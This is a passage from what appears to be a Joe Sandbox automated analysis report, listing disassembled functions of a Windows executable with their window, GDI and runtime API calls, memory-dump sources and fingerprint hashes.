                                                                                                                                                                                                                                                                                    Function 004181A0 Relevance: 10.7, APIs: 7, Instructions: 190windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 004181B6
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000006), ref: 00418204
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,000003FD), ref: 0041827F
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,000003FD), ref: 004182FA
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041833E
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00418350
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000003,0000FFFE), ref: 004183AA
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectWindow$ClientMessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1071774122-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 81f35ccb1619ef2e815f8add3878e72e1f22e65b62a8cf288e8ccd6dbd741210
                                                                                                                                                                                                                                                                                    • Instruction ID: 3d1e85c786be0547c74fbf31f73b40b43d39c9eef0f0cab4dee81a64cc519da0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81f35ccb1619ef2e815f8add3878e72e1f22e65b62a8cf288e8ccd6dbd741210
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9951B2713407026BD215EB60CD9AF6F73AAEBC4B04F04491CF6459B2D0EEB4E901879A
                                                                                                                                                                                                                                                                                    Function 0042EF10 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042EF55
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,-00000001,-00000001), ref: 0042EF6C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,-00000001,-00000001), ref: 0042EF88
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 0042EFF2
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,?,00000000), ref: 0042F0A9
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 1b28692c5bafc0e0b03818e8d9035994aace83cec63172a9aced00264d4cecb8
                                                                                                                                                                                                                                                                                    • Instruction ID: 4a8da6b0a3b4820785d32a6e99519bf5ba1baf34d33d3eec9a517c422a0835b5
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b28692c5bafc0e0b03818e8d9035994aace83cec63172a9aced00264d4cecb8
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51E2716083109BD720DF25E981B5BB7F4FB88710F800A7EF94997392D775E8058B9A
                                                                                                                                                                                                                                                                                    Function 004293B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 129windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                    • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                    • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                    • Opcode ID: 9be5c9983a3a9708faa268995b4b90c9b7baec8167950ea82a948411bb73ca8a
                                                                                                                                                                                                                                                                                    • Instruction ID: 6a8541e3f689305ec2f6cb5d2be3b4f28d8c1de2ea2bbd417e2b40b4f34285ca
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9be5c9983a3a9708faa268995b4b90c9b7baec8167950ea82a948411bb73ca8a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B44193B1704210ABD710EB65EC45BAB73A8AF94704F40892FF90ED2290DB78ED45C76D
                                                                                                                                                                                                                                                                                    Function 005035CA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00503601
                                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00503609
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00503692
                                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 005036BD
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00503712
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                    • Opcode ID: 727bd755396df652e1a708ec171ae51c463fec0952143e88064398cf5f6b08bc
                                                                                                                                                                                                                                                                                    • Instruction ID: 821d69273ac79cc1eb4721babc24db78b3a3adc9ff51cf5d9205813b4df27ecf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 727bd755396df652e1a708ec171ae51c463fec0952143e88064398cf5f6b08bc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2418234A00209AFCF10DF69C885A9EBFA9FF85314F148166E8195B3D2D732DB15CB91
                                                                                                                                                                                                                                                                                    Function 00467490 Relevance: 10.6, APIs: 7, Instructions: 118windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004674EB
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 004674FB
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0046751B
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0046752A
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00467561
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0046758A
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004675DC
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateParentRect$BitmapClientWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1335343179-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ae058cf5547a5b73137727556229a9f4d12eeb23d99a6f799289078dd219408d
                                                                                                                                                                                                                                                                                    • Instruction ID: ec974f87df7e9fb3a3618fae45b6badb24d167debaf80877d84b9ed91747ca3a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae058cf5547a5b73137727556229a9f4d12eeb23d99a6f799289078dd219408d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D411AB1508740AFC315DF68C985E5BBBE8FBD8714F008A1EF59A93290DB74E844CB66
                                                                                                                                                                                                                                                                                    Function 00423480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000010,00000002), ref: 0042352E
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(113262B6), ref: 00423545
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0042354F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CursorForegroundMenuWindow
                                                                                                                                                                                                                                                                                    • String ID: 3401016
                                                                                                                                                                                                                                                                                    • API String ID: 390680170-1597404659
                                                                                                                                                                                                                                                                                    • Opcode ID: 2a6a59c1264529a27330a631af8e172e3aa2cb4d668187ed554c8fb1c174a488
                                                                                                                                                                                                                                                                                    • Instruction ID: a08165e610b34e817a5423f464ddcc9bce1135992548fc6a69cc7effbf604316
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a6a59c1264529a27330a631af8e172e3aa2cb4d668187ed554c8fb1c174a488
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D31C472304340BBD324DF64D845F6B77A8EB84714F108A2FF50997680DB7DE8448BA9
                                                                                                                                                                                                                                                                                    Function 0042E730 Relevance: 10.6, APIs: 7, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _TrackMouseEvent.COMCTL32(00000010), ref: 0042E774
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 0042E7A7
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042E7C2
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 0042E7FC
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E821
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E83C
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042E84F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectRedrawWindow$ClientEventMouseTrack
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4196163336-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 54eeda5e9cc18010a30806788d475c85a44e97beb02a1b7b18afe2bd2e815317
                                                                                                                                                                                                                                                                                    • Instruction ID: c4f66d3cff0941ef47ae988eb42254fc96aed82a1b76600b02dc3c2c7e15cd00
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54eeda5e9cc18010a30806788d475c85a44e97beb02a1b7b18afe2bd2e815317
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F03127B15047059FD314DF69D880AABBBE9FB88314F044A2EF59A83350E770E944CFA6
                                                                                                                                                                                                                                                                                    Function 00424270 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,113262B6,75C05540,?,?,00421AA0,113262B6), ref: 004242B3
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 004242C5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00425460: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000000,?,Button_Check,?,?,00420A23), ref: 004254D9
